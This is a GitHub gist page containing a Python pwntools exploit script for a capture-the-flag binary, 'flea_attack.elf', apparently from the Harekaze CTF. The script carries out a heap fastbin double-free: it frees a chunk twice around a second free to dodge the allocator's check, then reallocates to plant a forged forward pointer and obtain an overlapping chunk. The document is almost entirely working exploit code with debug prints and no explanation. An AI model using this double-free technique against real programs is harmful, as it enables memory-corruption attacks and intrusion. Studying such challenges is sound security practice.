Create a gist now

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import pwn
from pwn import *
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
raw_input("<ATTACH NOW>")
p.recv()
# the size is 0x04.
p.sendline( ("A"*94 ) + p8(0x41)) # no-one cares
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
buf = "AAAA"
p.sendline(buf)
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)
print " PUTTING IN NEW CHUNK OF 50 FOR DEBUG"
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
p.recvuntil("Addr: ")
basechunk2 = int(p.recvuntil("\n").rstrip(),16)
print " ADDRESS OF CHUNK1 AT: %x" % basechunk
print " ADDRESS OF CHUNK2 AT: %x" % basechunk2
print "ALLOCATING ONE MORE FOR GOOD MEASURE..."
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
raw_input("<STOP1>")
p.recvuntil(">")
print " FREEING ORIGINAL CHUNK at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
print " FREEING SECOND CHUNK TO SKIP SECURITY CHECK at %x" % (basechunk2)
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk2))
p.recvuntil(">")
# p.interactive()
print " FREEING ORIGINAL CHUNK AGAIN at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
raw_input("<STOP2>")
print " SETUP: ALLOCATING FIRST CHUNK WITH NON-ZERO FD PTR"
p.sendline("1")
p.sendline("50")
buf = p64(0x204056)
p.sendline(buf)
p.recvuntil("Addr: ")
explsetup = int(p.recvuntil("\n").rstrip(),16)
print " SETUP: ALLOCATING SECOND CHUNK (TO GET FIRST CHUNK BACK TO FREELIST HEAD)"
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("bbbb")
p.recvuntil("Addr: ")
idgaf = int(p.recvuntil("\n").rstrip(),16)
print " OK, REALLOCATING OVER FIRST CHUNK'S FD..."
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("cccc")
p.recvuntil("Addr: ")
explchunk = int(p.recvuntil("\n").rstrip(),16)
p.recvuntil(">")
print " FIRST CHUNK REALLOCATE #1: %x" % explsetup
print " FIRST CHUNK REALLOCATE #2: %x" % explchunk
# reallocate 50, then add in "A"'s...
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment